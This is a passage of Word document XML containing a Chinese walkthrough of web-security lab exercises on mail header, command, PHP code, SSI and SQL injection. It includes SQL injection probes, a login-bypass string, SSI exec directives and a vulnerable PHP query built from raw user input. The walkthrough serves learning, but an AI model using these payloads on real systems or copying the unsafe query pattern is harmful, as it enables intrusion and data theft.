    <w:p w14:paraId="3DDA5C3A" w14:textId="322757FB" w:rsidR="00BC1B2F" w:rsidRDefault="00BC1B2F" w:rsidP="00BC1B2F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>MTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器会给</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户发送邮件</w:t>
      </w:r>
      <w:r w:rsidR="00373DBB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00D85A76">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这样</w:t>
      </w:r>
      <w:r w:rsidR="00373DBB" w:rsidRPr="00373DBB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidR="00D85A76">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就</w:t>
      </w:r>
      <w:r w:rsidR="00373DBB" w:rsidRPr="00373DBB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以匿名发送大量</w:t>
      </w:r>
      <w:r w:rsidR="00373DBB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>邮件</w:t>
      </w:r>
      <w:r w:rsidR="00373DBB" w:rsidRPr="00373DBB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，甚至发送网络钓鱼电子邮件，</w:t>
      </w:r>
      <w:r w:rsidR="00D85A76">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中收信人还认为</w:t>
      </w:r>
      <w:r w:rsidR="00373DBB" w:rsidRPr="00373DBB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来源</w:t>
      </w:r>
      <w:r w:rsidR="00D85A76">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可信</w:t>
      </w:r>
      <w:r w:rsidR="00373DBB" w:rsidRPr="00373DBB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00D85A76">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>除此之外</w:t>
      </w:r>
      <w:r w:rsidR="00373DBB" w:rsidRPr="00373DBB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，此漏洞不限于</w:t>
      </w:r>
      <w:r w:rsidR="00373DBB" w:rsidRPr="00373DBB">
        <w:t>PHP; 它可能会影响任何基于任意用户输入发送电子邮件的应用程序。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6709A2" w14:textId="62F8DE59" w:rsidR="0071783B" w:rsidRDefault="0071783B" w:rsidP="00BC1B2F"/>
    <w:p w14:paraId="0076D893" w14:textId="2737741B" w:rsidR="0071783B" w:rsidRDefault="0071783B" w:rsidP="00BC1B2F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>讲道理是这样，但实际测试并没有收到抄送的邮件</w:t>
      </w:r>
      <w:r w:rsidR="003C2A00">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，不晓得是哪里出错了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3E99D8" w14:textId="4251EF94" w:rsidR="00CE57B6" w:rsidRDefault="00CE57B6" w:rsidP="00BC1B2F"/>
    <w:p w14:paraId="0C55CAF9" w14:textId="5976B10A" w:rsidR="00875957" w:rsidRDefault="00875957" w:rsidP="00875957">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令行注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3972A86C" w14:textId="70C8DB70" w:rsidR="00875957" w:rsidRPr="00875957" w:rsidRDefault="00875957" w:rsidP="00875957">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="649753B1" wp14:editId="02DCFF75">
            <wp:extent cx="5274310" cy="305498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054985"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C60E59E" w14:textId="6DF7570D" w:rsidR="00875957" w:rsidRDefault="006C0E76" w:rsidP="00BC1B2F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行结果：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D37858" w14:textId="06F30DF1" w:rsidR="006C0E76" w:rsidRDefault="006C0E76" w:rsidP="00BC1B2F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="370F7C99" wp14:editId="44241AB8">
            <wp:extent cx="5274310" cy="1935480"/>
            <wp:effectExtent l="0" t="0" r="2540" b="762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1935480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="356A85C2" w14:textId="0C67DB75" w:rsidR="006C0E76" w:rsidRDefault="006C0E76" w:rsidP="00BC1B2F"/>
    <w:p w14:paraId="43ADB3E3" w14:textId="4E82AE50" w:rsidR="006C0E76" w:rsidRDefault="006C0E76" w:rsidP="006C0E76">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>命令行注入(</w:t>
      </w:r>
      <w:r>
        <w:t>Blind)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075ADBC4" w14:textId="77B87C52" w:rsidR="006C0E76" w:rsidRDefault="006C0E76" w:rsidP="00BC1B2F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B864A00" wp14:editId="6165D41E">
            <wp:extent cx="5274310" cy="137985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379855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="393E886B" w14:textId="212349CE" w:rsidR="00034B22" w:rsidRDefault="006C0E76" w:rsidP="00BC1B2F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58C52C25" wp14:editId="47748F6D">
            <wp:extent cx="5274310" cy="152717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527175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5093B23B" w14:textId="4D296670" w:rsidR="00034B22" w:rsidRDefault="00034B22" w:rsidP="00BC1B2F"/>
    <w:p w14:paraId="10CE7488" w14:textId="53B88BF0" w:rsidR="00034B22" w:rsidRDefault="00034B22" w:rsidP="00034B22">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>PHP</w:t>
      </w:r>
      <w:r w:rsidR="00E7491F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB27D3F" w14:textId="117727D1" w:rsidR="00034B22" w:rsidRPr="00034B22" w:rsidRDefault="00034B22" w:rsidP="00034B22">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="233F3F17" wp14:editId="4EE9281C">
            <wp:extent cx="5274310" cy="385699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3856990"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F7974E" w14:textId="7EE8D055" w:rsidR="00CE57B6" w:rsidRDefault="00CE57B6" w:rsidP="00034B22">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE57B6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Server-Side Includes (SSI) </w:t>
      </w:r>
      <w:r w:rsidR="00E7491F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6536A281" w14:textId="6CA126A7" w:rsidR="00CE57B6" w:rsidRDefault="004F42C3" w:rsidP="00BC1B2F">
      <w:r>
        <w:t>SSI就是在HTML文件中，可以通过注释行调用的命令或指针。</w:t>
      </w:r>
      <w:r w:rsidR="00F37C80" w:rsidRPr="00F37C80">
        <w:t>工作原理</w:t>
      </w:r>
      <w:r w:rsidR="000979A5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就是</w:t>
      </w:r>
      <w:r w:rsidR="00F37C80" w:rsidRPr="00F37C80">
        <w:t>将内容发送到浏览器之前，可以使用“服务器端包含 (SSI)”指令将文本、图形或应用程序信息包含到网页中</w:t>
      </w:r>
      <w:r w:rsidR="000979A5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B689DAF" w14:textId="3990C6B7" w:rsidR="004F42C3" w:rsidRDefault="004F42C3" w:rsidP="004F42C3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
        </w:rPr>
        <w:t>当符合下列条件时，攻击者可以在 Web 服务器上运行任意命令：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
        </w:rPr>
        <w:t>    A. Web 服务器已支持 SSI（服务器端包含）。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
        </w:rPr>
        <w:t>    B. Web 应用程序在返回 HTML 页面时，嵌入用户输入。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
        </w:rPr>
        <w:t>    C. 参数值未进行输入清理。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
        </w:rPr>
        <w:t>    例如，如果脚本接收文本输入，供 Web 服务器稍后处理，下列由 SSI 命令组成的输入便会侵害服务器的安全：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
        </w:rPr>
        <w:t>    &lt;!--#include file="..."--&gt;（会显示给定的文件）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;!--#exec </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
        </w:rPr>
        <w:t>="..."--&gt;（会执行给定的 shell 命令）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02242A6F" w14:textId="24FD9052" w:rsidR="00034B22" w:rsidRDefault="00034B22" w:rsidP="004F42C3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E966E3C" wp14:editId="3111E993">
            <wp:extent cx="5274310" cy="381000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3810000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="668125A9" w14:textId="204FA685" w:rsidR="004F42C3" w:rsidRPr="00034B22" w:rsidRDefault="00034B22" w:rsidP="00BC1B2F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AB41269" wp14:editId="3FDA6CE8">
            <wp:extent cx="5274310" cy="221678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216785"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9891C5" w14:textId="68EB151F" w:rsidR="00F64C6D" w:rsidRPr="00F64C6D" w:rsidRDefault="00E7491F" w:rsidP="00F64C6D">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>QL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D31BECD" w14:textId="57C7BB68" w:rsidR="00062E5B" w:rsidRDefault="00E7491F" w:rsidP="00062E5B">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>GET/Search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653152E0" w14:textId="48009240" w:rsidR="007B613A" w:rsidRDefault="00F64C6D" w:rsidP="007B613A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开网页，一个输入点，应该是很简单的查询，</w:t>
      </w:r>
      <w:r w:rsidR="007B613A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先手工测试一下注入点吧！</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC43276" w14:textId="30454194" w:rsidR="007B613A" w:rsidRDefault="007B613A" w:rsidP="007B613A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先输入’，发现有错</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A45B1C" w14:textId="6BF19B50" w:rsidR="007B613A" w:rsidRDefault="007B613A" w:rsidP="007B613A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入</w:t>
      </w:r>
      <w:r>
        <w:t>a，出现正常</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08045F76" w14:textId="21ADF6F2" w:rsidR="007B613A" w:rsidRDefault="007B613A" w:rsidP="007B613A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入</w:t>
      </w:r>
      <w:r>
        <w:t>a' or 1=1#，与a输入的内容一致</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2994A615" w14:textId="4158BAF9" w:rsidR="007B613A" w:rsidRDefault="007B613A" w:rsidP="007B613A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入</w:t>
      </w:r>
      <w:r>
        <w:t>a' or 1=2#，出现查不到内容，证明有注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0409CA03" w14:textId="5158FEDC" w:rsidR="00F228B1" w:rsidRDefault="00AA6382" w:rsidP="007B613A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为什么呢，我们看一下源代码的查询语句：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D878801" w14:textId="554FAEE2" w:rsidR="00AA6382" w:rsidRDefault="00AA6382" w:rsidP="00AA6382">
      <w:r>
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23794DFB" w14:textId="77777777" w:rsidR="00AA6382" w:rsidRDefault="00AA6382" w:rsidP="00AA6382">
      <w:r>
        <w:t>if(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>isset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($_GET["title"]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509CFBF8" w14:textId="6CF4FC53" w:rsidR="00AA6382" w:rsidRDefault="00AA6382" w:rsidP="00AA6382">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFBB9DF" w14:textId="0D80EF65" w:rsidR="00AA6382" w:rsidRDefault="00AA6382" w:rsidP="00AA6382">
      <w:r>
        <w:t xml:space="preserve">    $title = $_GET["title"];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174A0F78" w14:textId="266CB741" w:rsidR="00AA6382" w:rsidRDefault="00AA6382" w:rsidP="00AA6382">
      <w:r>
        <w:t xml:space="preserve">    $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "SELECT * FROM movies WHERE title LIKE '%" . </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sqli</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($title) . "%'";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC942CC" w14:textId="33BF0FFB" w:rsidR="00AA6382" w:rsidRPr="00AA6382" w:rsidRDefault="00AA6382" w:rsidP="00AA6382">
      <w:r>
        <w:t xml:space="preserve">    $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>recordset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql_query</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, $link);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401447D4" w14:textId="77777777" w:rsidR="00AA6382" w:rsidRDefault="00AA6382" w:rsidP="00AA6382">
      <w:r>
        <w:t xml:space="preserve">    if(!$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>recordset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D7B79E" w14:textId="43D4E215" w:rsidR="00AA6382" w:rsidRDefault="00AA6382" w:rsidP="00AA6382">
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4E1CC0" w14:textId="58F2078F" w:rsidR="00AA6382" w:rsidRDefault="00AA6382" w:rsidP="00AA6382">
      <w:r>
        <w:t xml:space="preserve">        // die("Error: " . </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql_error</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258A3E22" w14:textId="5818E12C" w:rsidR="00AA6382" w:rsidRDefault="00AA6382" w:rsidP="00AA6382">
      <w:r>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D834839" w14:textId="26E5BFEE" w:rsidR="00AA6382" w:rsidRDefault="00AA6382" w:rsidP="00AA6382">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入的本质，就能理解上文的证明过程。不同的情况需要灵活变动测试语句。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73225959" w14:textId="699EEF47" w:rsidR="00F64C6D" w:rsidRDefault="00F64C6D" w:rsidP="007B613A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>万能密码走一波：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’ or ‘’=’ # </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246D6EBB" w14:textId="12A23044" w:rsidR="00227106" w:rsidRDefault="00F64C6D" w:rsidP="00227106">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="173EDB7F" wp14:editId="499C7786">
            <wp:extent cx="5274310" cy="3974465"/>
            <wp:effectExtent l="0" t="0" r="2540" b="698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3974465"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E23181B" w14:textId="219AC51C" w:rsidR="00227106" w:rsidRDefault="007B613A" w:rsidP="00227106">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>qlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的使用就不介绍了，一下子就跑出来了</w:t>
      </w:r>
      <w:r>
        <w:t>……</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有了注入点之后，接下来就是手工注入</w:t>
      </w:r>
      <w:r w:rsidR="00AA6382">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取数据了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19243848" w14:textId="210954E9" w:rsidR="007B613A" w:rsidRDefault="00E7491F" w:rsidP="00AA6382">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>GET/Select</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3276745A" w14:textId="6C965BE1" w:rsidR="007B613A" w:rsidRDefault="00DB7147" w:rsidP="00227106">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中有两个参数，先测试第一个然后就有收获了</w:t>
      </w:r>
      <w:r w:rsidR="00343156">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如果不行就尝试第二个参数，如果实际渗透过程中，参数太多的话，在不影响目标系统正常业务的情况下可以尝试使用工具进行注入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2F7C50" w14:textId="637FE7A8" w:rsidR="00A04A3F" w:rsidRDefault="007B613A" w:rsidP="00227106">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21423E36" wp14:editId="16617E83">
            <wp:extent cx="5274310" cy="3077845"/>
            <wp:effectExtent l="0" t="0" r="2540" b="825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3077845"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE6F744" w14:textId="77777777" w:rsidR="00A04A3F" w:rsidRDefault="00A04A3F" w:rsidP="00227106"/>
    <w:p w14:paraId="697DF4F6" w14:textId="3A33B98C" w:rsidR="00DB7147" w:rsidRDefault="00DB7147" w:rsidP="00227106">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入基础知识（</w:t>
      </w:r>
      <w:r w:rsidR="00634E76" w:rsidRPr="00634E76">
        <w:t>http://www.cnblogs.com/backlion/p/7344548.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5177D7DE" w14:textId="0BE38099" w:rsidR="007B613A" w:rsidRDefault="007B613A" w:rsidP="00227106">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据回显构造查询语句</w:t>
      </w:r>
      <w:r w:rsidR="007B072C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CB3D07" w14:textId="44B1F865" w:rsidR="007B613A" w:rsidRPr="00227106" w:rsidRDefault="007B613A" w:rsidP="00227106">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A931CEB" wp14:editId="3798B6B6">
            <wp:extent cx="5274310" cy="2607945"/>
            <wp:effectExtent l="0" t="0" r="2540" b="190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607945"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5B61B1" w14:textId="5FBF9007" w:rsidR="00DB7147" w:rsidRDefault="00E7491F" w:rsidP="00DB7147">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>POST/Search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1106A8B6" w14:textId="39C0A92C" w:rsidR="00227106" w:rsidRDefault="009F2059" w:rsidP="00227106">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求方法不一样而已，同上</w:t>
      </w:r>
      <w:r w:rsidR="00DB7147">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
